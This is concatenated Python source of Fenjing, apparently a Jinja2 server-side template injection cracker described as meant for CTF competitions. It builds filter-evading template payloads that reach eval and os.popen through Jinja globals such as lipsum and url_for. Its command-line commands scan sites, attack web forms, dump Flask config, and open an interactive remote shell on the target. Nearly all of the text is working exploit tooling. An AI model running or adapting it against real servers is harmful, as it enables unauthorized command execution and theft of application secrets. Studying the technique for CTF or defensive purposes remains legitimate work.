        (STRING_STRING_CONCNAT, ),
        (STRING_UNDERLINE, ),
        (LITERAL, "*"),
        (INTEGER, 2),
    ]


@req_gen
def gen_string_concat1(context: dict, value: str):
    return [
        (LITERAL, "({})".format(
            "+".join("'{}'".format(c if c != "'" else "\\'") for c in value)
        ))
    ]


@req_gen
def gen_string_concat2(context: dict, value: str):
    return [
        (LITERAL, "({})".format(
            "+".join('"{}"'.format(c if c != '"' else '\\"') for c in value)
        ))
    ]


@req_gen
def gen_string_concat3(context: dict, value: str):
    return [
        (LITERAL, "({})".format(
            "".join('"{}"'.format(c if c != '"' else '\\"') for c in value)
        ))
    ]


@req_gen
def gen_string_dictjoin(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [
            (UNSATISFIED, )
        ]
    return [
        (LITERAL, "(dict({}=x)|join)".format(value))
    ]


@req_gen
def gen_string_splitdictjoin(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [
            (UNSATISFIED, )
        ]
    parts = [
        value[i:i+3] for i in range(0, len(value), 3)
    ]
    req = []
    for i, part in enumerate(parts):
        if i != 0:
            req.append((STRING_STRING_CONCNAT, ))
        req.append((LITERAL, "(dict({}=x)|join)".format(part)))
    return req


@req_gen
def gen_string_splitdictjoin2(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [
            (UNSATISFIED, )
        ]
    parts = [
        value[i:i+3] for i in range(0, len(value), 3)
    ]

    if len(set(parts)) != len(parts):
        return [
            (UNSATISFIED, )
        ]

    return [
        (LITERAL, "(dict({})|join)".format(",".join(f"{part}=x" for part in parts)))
    ]


@req_gen
def gen_string_splitdictjoin3(context: dict, value: str):
    if not re.match("^[a-zA-Z_]+$", value):
        return [
            (UNSATISFIED, )
        ]

    if len(set(value)) != len(value):
        return [
            (UNSATISFIED, )
        ]

    return [
        (LITERAL, "(dict({})|join)".format(",".join(f"{part}=x" for part in value)))
    ]


@req_gen
def gen_string_formatpercent(context: dict, value: str):
    # (('%c'*n)%(97,98,99))
    req = []
    req.append(
        (LITERAL, "((")
    )
    req.append(
        (STRING_MANY_PERCENT_LOWER_C, len(value))
    )
    req.append(
        (LITERAL, ")%(")
    )
    for i, c in enumerate(value):
        if i != 0:
            req.append((LITERAL, ","))
        req.append((INTEGER, ord(c)))
    req.append(
        (LITERAL, "))")
    )
    return req


@req_gen
def gen_string_formatfunc(context: dict, value: str):
    # (('%c'*n)|format(97,98,99))
    req = []
    req.append(
        (LITERAL, "((")
    )
    req.append(
        (STRING_MANY_PERCENT_LOWER_C, len(value))
    )
    req.append(
        (LITERAL, ")|format(")
    )
    for i, c in enumerate(value):
        if i != 0:
            req.append((LITERAL, ","))
        req.append((INTEGER, ord(c)))
    req.append(
        (LITERAL, "))")
    )
    return req


@req_gen
def gen_string_formatfunc2(context: dict, value: str):
    # (FORMAT(97,98,99))
    # FORMAT = (CS.format)
    # CS = (C*L)
    if re.match("^[a-z]+$", value): # avoid infinite recursion
        return [
            (UNSATISFIED, )
        ]
    if "{:c}" not in context.values():
        return [
            (UNSATISFIED, )
        ]
    k = [k for k, v in context.values() if v == "{:c}"][0]
    cs = "({c}*{l})".format(
        c=k,
        l=len(value)
    )
    format_func = (ATTRIBUTE, (LITERAL, cs), "format")
    req = [
        (LITERAL, "("),
        format_func,
        (LITERAL, "("),
        (LITERAL, ",".join(str(ord(c)) for c in value)),
        (LITERAL, "))")
    ]
    return req


@req_gen
def gen_string_formatfunc3(context: dict, value: str):
    # (FORMAT(97,98,99))
    # FORMAT = (CS.format)
    # CS = (C*L)
    if re.match("^[a-z]+$", value): # avoid infinite recursion
        return [
            (UNSATISFIED, )
        ]
    cs = "(({c})*{l})".format(
        c="{1:2}|string|replace({1:2}|string|batch(4)|first|last,{}|join)|replace(1|string,{}|join)|replace(2|string,dict(c=1)|join)",
        l=len(value)
    )
    format_func = (ATTRIBUTE, (LITERAL, cs), "format")
    req = [
        (LITERAL, "("),
        format_func,
        (LITERAL, "("),
        (LITERAL, ",".join(str(ord(c)) for c in value)),
        (LITERAL, "))")
    ]
    return req

# ---


@req_gen
def gen_attribute_normal1(context, obj_req, attr_name):
    if not re.match("[A-Za-z_][A-Za-z0-9_]+", attr_name):
        return [
            (UNSATISFIED, )
        ]
    return [
        (LITERAL, "("),
        obj_req,
        (LITERAL, "."),
        (LITERAL, attr_name),
        (LITERAL, ")"),
    ]


@req_gen
def gen_attribute_normal2(context, obj_req, attr_name):
    return [
        (LITERAL, "("),
        obj_req,
        (LITERAL, "["),
        (STRING, attr_name),
        (LITERAL, "])"),
    ]


@req_gen
def gen_attribute_attrfilter(context, obj_req, attr_name):
    return [
        (LITERAL, "("),
        obj_req,
        (LITERAL, "|attr("),
        (STRING, attr_name),
        (LITERAL, "))"),
    ]

# ---


@req_gen
def gen_item_normal1(context, obj_req, item_name):
    if not re.match("[A-Za-z_][A-Za-z0-9_]+", item_name):
        return [
            (UNSATISFIED, )
        ]
    return [
        (LITERAL, "("),
        obj_req,
        (LITERAL, "."),
        (LITERAL, item_name),
        (LITERAL, ")"),
    ]


@req_gen
def gen_item_normal2(context, obj_req, item_name):
    return [
        (LITERAL, "("),
        obj_req,
        (LITERAL, "["),
        (STRING, item_name),
        (LITERAL, "])"),
    ]


@req_gen
def gen_item_dunderfunc(context, obj_req, item_name):
    return [
        (LITERAL, "("),
        (ATTRIBUTE, obj_req, "__getitem__"),
        (LITERAL, "("),
        (STRING, item_name),
        (LITERAL, "))"),
    ]

# ---


@req_gen
def gen_class_attribute_literal(context, obj_req, attr_name):
    # obj.__class__.attr
    return [
        (
            ATTRIBUTE,
            obj_req,
            "__class__",
        ),
        (LITERAL, "." + attr_name)
    ]


@req_gen
def gen_class_attribute_attrfilter(context, obj_req, attr_name):
    # obj.__class__.attr
    return [
        (LITERAL, "("),
        (
            ATTRIBUTE,
            obj_req,
            "__class__",
        ),
        (LITERAL, "|attr("),
        (STRING, attr_name),
        (LITERAL, "))"),
    ]
# ---


@req_gen
def gen_chained_attribute_item_normal(context, obj_req, *attr_item_req):
    if not attr_item_req:
        return [obj_req,]
    first_req, *other_req = attr_item_req
    req_type, req_name = first_req
    got_req = (
        req_type,
        obj_req,
        req_name,
    )
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            got_req,
            *other_req,
        ),
    ]

# ---


# ---


@req_gen
def gen_eval_func_lipsum(context):
    return [(
        CHAINED_ATTRIBUTE_ITEM,
        (LITERAL, "lipsum"),
        (ATTRIBUTE, "__globals__"),
        (ITEM, "__builtins__"),
        (ITEM, "eval")
    )]


@req_gen
def gen_eval_func_joiner(context):
    return [(
        CHAINED_ATTRIBUTE_ITEM,
        (LITERAL, "joiner"),
        (ATTRIBUTE, "__init__"),
        (ATTRIBUTE, "__globals__"),
        (ITEM, "__builtins__"),
        (ITEM, "eval")
    )]

# @req_gen
# def gen_eval_func_x(context):
#     return [(
#         CHAINED_ATTRIBUTE_ITEM,
#         (LITERAL, "x"),
#         (ATTRIBUTE, "__init__"),
#         (ATTRIBUTE, "__globals__"),
#         (ITEM, "__builtins__"),
#         (ITEM, "eval")
#     )]

# ---


@req_gen
def gen_eval_normal(context, code):
    return [
        (LITERAL, "("),
        (EVAL_FUNC, ),
        (LITERAL, "("),
        (STRING, code),
        (LITERAL, "))")
    ]

# ---


@req_gen
def gen_config_literal(context):
    return [
        (LITERAL, "config")
    ]


@req_gen
def gen_config_self(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (LITERAL, "self"),
            (ATTRIBUTE, "__dict__"),
            (ITEM, "_TemplateReference__context"),
            (ITEM, "config"),
        )
    ]


@req_gen
def gen_config_request(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (LITERAL, "request"),
            (ATTRIBUTE, "application"),
            (ATTRIBUTE, "__self__"),
            (ATTRIBUTE, "json_module"),
            (ATTRIBUTE, "JSONEncoder"),
            (ATTRIBUTE, "default"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "current_app"),
            (ATTRIBUTE, "config"),
        )
    ]

# ---


@req_gen
def gen_module_os_urlfor(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (LITERAL, "url_for"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "os")
        )
    ]


@req_gen
def gen_module_os_config(context):
    return [
        (
            CHAINED_ATTRIBUTE_ITEM,
            (CONFIG, ),
            (CLASS_ATTRIBUTE, "__init__"),
            (ATTRIBUTE, "__globals__"),
            (ITEM, "os"),
        )
    ]

# ---


@req_gen
def gen_os_popen_obj_eval(context, cmd):
    cmd = cmd.replace("'", "\\'")
    return [
        (EVAL, "__import__('os').popen('" + cmd + "')")
    ]


@req_gen
def gen_os_popen_obj_normal(context, cmd):
    return [
        (LITERAL, "("),
        (
            ATTRIBUTE,
            (MODULE_OS, ),
            "popen"
        ),
        (LITERAL, "("),
        (STRING, cmd),
        (LITERAL, "))"),
    ]


# ---


@req_gen
def gen_os_popen_read_normal(context, cmd):
    return [
        (LITERAL, "("),
        (ATTRIBUTE, (OS_POPEN_OBJ, cmd), "read"),
        (LITERAL, "())"),
    ]


if __name__ == "__main__":
    import time
    import functools

    @functools.lru_cache(100)
    def waf_func(payload: str):
        time.sleep(0.2)
        return all(word not in payload for word in ['\'', '"', '.', '_', 'import', 'request', 'url', '\\x', 'os', 'system', '\\u', '22'])

    payload = generate(
        OS_POPEN_READ,
        "ls",
        waf_func=waf_func,
        context={"loo": 100, "lo": 10, "l": 1, "un": "_"}
    )
    print(payload)



from collections import namedtuple

IntVars = namedtuple("IntVars", "payload ints var_names")


def int_var(payload, i, var_name):
    return IntVars(
        payload=payload,
        ints=[i, ],
        var_names=[var_name, ]
    )


int_vars_list = [
    IntVars(
        payload=(
            "{%set oa={}|int%}" +
            "{%set la=oa**oa%}" +
            "{%set lla=(la~la)|int%}" +
            "{%set llla=(lla~la)|int%}" +
            "{%set lllla=(llla~la)|int%}"
        ),
        ints=[
            0,
            1,
            11,
            111,
            1111
        ],
        var_names=[
            "oa",
            "la",
            "lla",
            "llla",
            "lllla",
        ]
    ),
    IntVars(
        payload=(
            "{%set ob={}|int%}" +
            "{%set lb=ob**ob%}" +
            "{%set llb=(lb~lb)|int%}" +
            "{%set lllb=(llb~lb)|int%}" +
            "{%set llllb=(lllb~lb)|int%}" +
            "{%set bb=llb-lb-lb-lb-lb-lb%}" +
            "{%set sbb=lllb-llb-llb-llb-llb-llb%}" +
            "{%set ssbb=llllb-lllb-lllb-lllb-lllb-lllb%}" +
            "{%set zzeb=llllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb%}"
        ),
        ints=[
            0,
            1,
            11,
            111,
            1111,
            6,
            56,
            556,
            223,
        ],
        var_names=[
            "ob",
            "lb",
            "llb",
            "lllb",
            "llllb",
            "bb",
            "sbb",
            "ssbb",
            "zzeb"
        ]
    ),
    int_var(
        "{%set zols=lipsum|escape|urlencode|list|escape|urlencode|count%}", 2015, "zols"),
    int_var(
        "{%set ltr={}|escape|urlencode|list|escape|urlencode|count%}", 178, "ltr"),
    int_var("{%set lea=namespace|escape|urlencode|escape|urlencode|urlencode|urlencode|count%}", 134, "lea"),
    int_var("{%set lel=cycler|escape|urlencode|escape|urlencode|escape|urlencode|escape|urlencode|count%}", 131, "lel"),
    int_var("{%set qo=namespace|escape|urlencode|escape|urlencode|count%}", 90, "qo"),
    int_var("{%set bs=cycler|escape|urlencode|count%}", 65, "bs"),
    int_var("{%set ab=namespace|escape|count%}", 46, "ab"),
    int_var("{%set zb={}|escape|list|escape|count%}", 26, "zb"),
    int_var("{%set t=joiner|urlencode|wordcount%}", 7, "t"),
    int_var("{%set b={}|escape|urlencode|count%}", 6, "b"),
    int_var("{%set e=(dict(a=x,b=x,c=x)|count)%}", 3, "e"),
    int_var("{%set l={}|escape|first|count%}", 1, "l"),
]


def get_useable_int_vars(waf_func):
    ints, var_names, payload = [], [], ""
    for int_vars in int_vars_list:
        if not waf_func(int_vars.payload):
            continue
        ints += int_vars.ints
        var_names += int_vars.var_names
        payload += int_vars.payload
    return ints, var_names, payload



DEFAULT_USER_AGENT = "Fenjing/0.1"

LITERAL = "literal"
UNSATISFIED = "unsatisfied"
ZERO = "zero"
POSITIVE_INTEGER = "positive_integer"
INTEGER = "integer"
STRING_STRING_CONCNAT = "string_string_concat"
STRING_PERCENT = "string_percent"
STRING_PERCENT_LOWER_C = "string_percent_lower_c"
STRING_UNDERLINE = "string_underline"
STRING_LOWERC = "string_lower_c"
STRING_MANY_PERCENT_LOWER_C = "string_many_percent_lower_c"
STRING = "string"
FORMULAR_SUM = "formular_sum"
ATTRIBUTE = "attribute"
ITEM = "item"
CLASS_ATTRIBUTE = "class_attribute"
CHAINED_ATTRIBUTE_ITEM = "chained_attribute_item"
EVAL_FUNC = "eval_func"
EVAL = "eval"
CONFIG = "config"
MODULE_OS = "module_os"
OS_POPEN_OBJ = "os_popen_obj"
OS_POPEN_READ = "os_popen_read"

GEN_TYPES = [
    "literal",
    "unsatisfied",
    "zero",
    "positive_integer",
    "integer",
    "string_string_concat",
    "string_percent",
    "string_percent_lower_c",
    "string_underline",
    "string_lower_c",
    "string_many_percent_lower_c",
    "string",
    "formular_sum",
    "attribute",
    "item",
    "class_attribute",
    "chained_attribute_item",
    "eval_func",
    "eval",
    "config",
    "module_os",
    "os_popen_obj",
    "os_popen_read",
]

CALLBACK_PREPARE_FULLPAYLOADGEN = "prepare_fullpayloadgen"
CALLBACK_GENERATE_FULLPAYLOAD = "generate_full_payload"
CALLBACK_GENERATE_PAYLOAD = "payload_gen"
CALLBACK_SUBMIT = "submit"
CALLBACK_TEST_FORM_INPUT = "test_form_input"

APICODE_OK = 200
APICODE_WRONG_INPUT = 401



import logging
from urllib.parse import urlparse
from traceback import print_exc
from typing import Callable, List
from functools import partial

from .form import Form
from .form_cracker import FormCracker
from .full_payload_gen import FullPayloadGen
from .scan_url import yield_form
from .requester import Requester
from .const import *
from .colorize import colored
from .webui import main as webui_main
import click

TITLE = colored("yellow", r"""
    ____             _ _            
   / __/__  ____    (_|_)___  ____ _
  / /_/ _ \/ __ \  / / / __ \/ __ `/
 / __/  __/ / / / / / / / / / /_/ / 
/_/  \___/_/ /_/_/ /_/_/ /_/\__, /  
              /___/        /____/   
""".strip("\n"), bold=True)
LOGGING_FORMAT = "%(levelname)s:[%(name)s] | %(message)s"

logging.basicConfig(
    level=logging.INFO,
    format=LOGGING_FORMAT
)
logger = logging.getLogger("cli")


def cmd_exec(cmd, cracker: FormCracker, field: str, full_payload_gen: FullPayloadGen):
    payload, will_print = full_payload_gen.generate(OS_POPEN_READ, cmd)
    logger.info(f"Submit payload {colored('blue', payload)}")
    if not will_print:
        logger.warning("Payload generator says that this payload {wont_print} command execution result.".format(
            wont_print = colored('red', "won't print")
        ))
    r = cracker.submit(
        {field: payload})
    assert r is not None
    return r.text


def interact(cmd_exec: Callable):
    """根据提供的payload生成方法向用户提供一个交互终端

    Args:
        cmd_exec (Callable): 根据输入的shell命令生成对应的payload
    """
    logger.info(f"Use {colored('cran', 'Ctrl+D', bold=True)} to exit.")
    while True:
        try:
            cmd = input("$>> ")
        except EOFError:
            break
        except KeyboardInterrupt:
            break
        try:
            result = cmd_exec(cmd)
            print(result)
        except Exception:
            print_exc()


@click.group()
def main():
    pass


@main.command()
@click.option("--url", "-u", help="form所在的URL")
@click.option("--action", "-a", default=None, help="form的action，默认为当前路径")
@click.option("--method", "-m", default="POST", help="form的提交方式，默认为POST")
@click.option("--inputs", "-i", help="form的参数，以逗号分隔")
@click.option("--interval", default=0.0, help="每次请求的间隔")
@click.option("--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent")
def get_config(
        url: str,
        action: str,
        method: str,
        inputs: str,
        interval: float,
        user_agent: str):
    """
    攻击指定的表单，并获得目标服务器的flask config
    """
    print(TITLE)
    assert all(param is not None for param in [
               url, inputs]), "Please check your param"
    form = Form(
        action=action or urlparse(url).path,
        method=method,
        inputs=inputs.split(",")
    )
    requester = Requester(
        interval=interval,
        user_agent=user_agent
    )
    cracker = FormCracker(
        url=url,
        form=form,
        requester=requester
    )
    result = cracker.crack()
    if result is None:
        logger.warning("Test form failed...")
        return
    full_payload_gen, field = result
    payload = full_payload_gen.generate(CONFIG)
    r = cracker.submit(
        {field: payload})
    
    print(r.text if r is not None else None)
    logger.warning("Bye!")

@main.command()
@click.option("--url", "-u", help="form所在的URL")
@click.option("--action", "-a", default=None, help="form的action，默认为当前路径")
@click.option("--method", "-m", default="POST", help="form的提交方式，默认为POST")
@click.option("--inputs", "-i", help="form的参数，以逗号分隔")
@click.option("--exec-cmd", "-e", default="", help="成功后执行的shell指令，不填则成功后进入交互模式")
@click.option("--interval", default=0.0, help="每次请求的间隔")
@click.option("--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent")
def crack(
        url: str,
        action: str,
        method: str,
        inputs: str,
        exec_cmd: str,
        interval: float,
        user_agent: str):
    """
    攻击指定的表单
    """
    print(TITLE)
    assert all(param is not None for param in [
               url, inputs]), "Please check your param"
    form = Form(
        action=action or urlparse(url).path,
        method=method,
        inputs=inputs.split(",")
    )
    requester = Requester(
        interval=interval,
        user_agent=user_agent
    )
    cracker = FormCracker(
        url=url,
        form=form,
        requester=requester
    )
    result = cracker.crack()
    if result is None:
        logger.warning("Test form failed...")
        return
    full_payload_gen, field = result
    cmd_exec_func = partial(cmd_exec, cracker=cracker,
                            field=field, full_payload_gen=full_payload_gen)
    if exec_cmd == "":
        interact(cmd_exec_func)
    else:
        print(cmd_exec_func(exec_cmd))
    logger.warning("Bye!")


@main.command()
@click.option("--url", "-u", help="需要扫描的URL")
@click.option("--exec-cmd", "-e", default="", help="成功后执行的shell指令，不填则进入交互模式")
@click.option("--interval", default=0.0, help="每次请求的间隔")
@click.option("--user-agent", default=DEFAULT_USER_AGENT, help="请求时使用的User Agent")
def scan(url, exec_cmd, interval, user_agent):
    """
    扫描指定的网站
    """
    print(TITLE)
    requester = Requester(interval=interval, user_agent=user_agent)
    for page_url, forms in yield_form(requester, url):
        for form in forms:
            cracker = FormCracker(url=page_url, form=form, requester=requester)
            result = cracker.crack()
            if result is None:
                continue
            full_payload_gen, field = result
            cmd_exec_func = partial(cmd_exec, cracker=cracker,
                                    field=field, full_payload_gen=full_payload_gen)
            if exec_cmd == "":
                interact(cmd_exec_func)
            else:
                print(cmd_exec_func(exec_cmd))
            return
    logger.warning("Scan failed...")


@main.command()
def webui():
    webui_main()

if __name__ == '__main__':
    main()



import setuptools
import os

with open("README.md", "r") as f:
    long_description = f.read()

with open("VERSION", "r") as f:
    version = f.read().strip()

with open("requirements.txt", "r") as f:
    requirements = [
        line.strip() for line in f.readlines()
    ]

setuptools.setup(
    name="fenjing",
    version=version,
    author="Marven11",
    author_email="marven11@example.com",
    description="A Jinja2 SSTI cracker for CTF competitions",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/Marven11/Fenjing",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3.9",
        "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
        "Operating System :: OS Independent",
    ],
    install_requires=requirements,
    package_data={
        "fenjing": ["templates/*", "static/*"],
    },
)



from typing import Callable, Tuple, Dict, Union
from .const import CONFIG
from .full_payload_gen import FullPayloadGen

full_payload_store: Dict[int, FullPayloadGen] = {}

def config_payload(waf_func: Callable[[str, ], bool]) -> Union[str, None]:
    """根据提供的waf函数生成读取config的payload

    Args:
        waf_func (Callable[[str, ], bool]): waf函数，判断提供的payload能否通过waf, 能则返回True

    Returns:
        str|None: payload
    """
    full_payload = None
    if id(waf_func) not in full_payload_store:
        full_payload = FullPayloadGen(waf_func)
        full_payload_store[id(waf_func)] = full_payload
    else:
        full_payload = full_payload_store[id(waf_func)]
    payload, will_print = full_payload.generate(CONFIG)
    if not will_print:
        return None
    return payload




from typing import Callable, List, Tuple, Union, Dict
import logging

from . import payload_gen
from .int_vars import get_useable_int_vars
from .colorize import colored
from .const import *

logger = logging.getLogger("shell_payload")


def get_int_context(waf_func):
    ints, var_names, payload = get_useable_int_vars(waf_func)
    if len(ints) == 0:
        logger.warning("No IntVars For YOU!")
    return payload, dict(zip(var_names, ints))


def get_str_context(waf_func):
    str_vars = [
        ("un", "_", "{%set un=(lipsum|escape|batch(22)|list|first|last)%}"),
        ("perc", "%", "{%set perc=(lipsum[(lipsum|escape|batch(22)|list|first|last)*2" +
         "+dict(globals=x)|join+(lipsum|escape|batch(22)|list|first|last)*2]" +
         "[(lipsum|escape|batch(22)|list|first|last)*2+dict(builtins=x)" +
         "|join+(lipsum|escape|batch(22)|list|first|last)*2][dict(chr=x)|join](37))%}"),
        # ("fc", "{:c}", "{%set fc={{{1:2}|string|replace({1:2}|string|batch(4)|first|last,{}|join)|replace(1|string,{}|join)|replace(2|string,dict(c=1)|join)}}%}")
    ]
    str_vars = [tpl for tpl in str_vars if waf_func(tpl[2])]
    return "".join(payload for _, _, payload in str_vars), {var_name: var_value for var_name, var_value, _ in str_vars}


def get_outer_pattern(waf_func):
    outer_payloads = [
        ("{{}}", "{{PAYLOAD}}", True),
        ("{%print()%}", "{%print(PAYLOAD)%}", True),
        ("{%if()%}{%endif%}", "{%if(PAYLOAD)%}{%endif%}", False),
        ("{% set x= %}", "{% set x=PAYLOAD %}", False),
    ]
    for test_payload, outer_pattern, will_print in outer_payloads:
        if waf_func(test_payload):
            return outer_pattern, will_print
    else:
        logger.warning("LOTS OF THINGS is being waf, NOTHING FOR YOU!")
        return None, None


class FullPayloadGen:
    def __init__(self, waf_func, callback: Union[Callable[[str, Dict], None], None] = None):
        self.waf_func = waf_func
        self.prepared = False
        self.callback: Callable[[str, Dict], None] = callback if callback else (lambda x, y: None)

    def do_prepare(self) -> bool:

        if self.prepared:
            return True

        int_payload, int_context = get_int_context(self.waf_func)
        str_payload, str_context = get_str_context(self.waf_func)

        self.context_payload, self.context = int_payload + \
            str_payload, {**int_context, **str_context}
        self.outer_pattern, self.will_print = get_outer_pattern(self.waf_func)
        if not self.outer_pattern:
            return False
        if self.will_print:
            logger.info(f"use {colored('blue', self.outer_pattern)}")
        else:
            logger.warning(
                f"use {colored('blue', self.outer_pattern)}, which {colored('red', 'will not print')} your result!")

        self.payload_gen = payload_gen.PayloadGenerator(self.waf_func, self.context, self.callback)
        self.prepared = True
        self.callback(CALLBACK_PREPARE_FULLPAYLOADGEN, {
            "context_payload": self.context_payload,
            "context": self.context,
            "outer_pattern": self.outer_pattern,
            "will_print": self.will_print,
        })
        return True

    def generate(self, gen_type, *args) -> Tuple[Union[str, None], Union[bool, None]]:

        if not self.prepared and not self.do_prepare():
            return None, None

        inner_payload = self.payload_gen.generate(gen_type, *args)

        if inner_payload is None:
            logger.warning("Bypassing WAF Failed.")
            return None, None

        assert isinstance(self.outer_pattern, str)

        payload = self.context_payload + self.outer_pattern.replace("PAYLOAD", inner_payload)

        self.callback(CALLBACK_GENERATE_FULLPAYLOAD, {
            "gen_type": gen_type,
            "args": args,
            "payload": payload,
            "will_print": self.will_print,
        })

        return (
            payload, 
            self.will_print
        )





from . import exceptions, payload_gen
from .shell_payload import exec_cmd_payload
from .config_payload import config_payload
from .int_vars import get_useable_int_vars
from .form import Form, fill_form
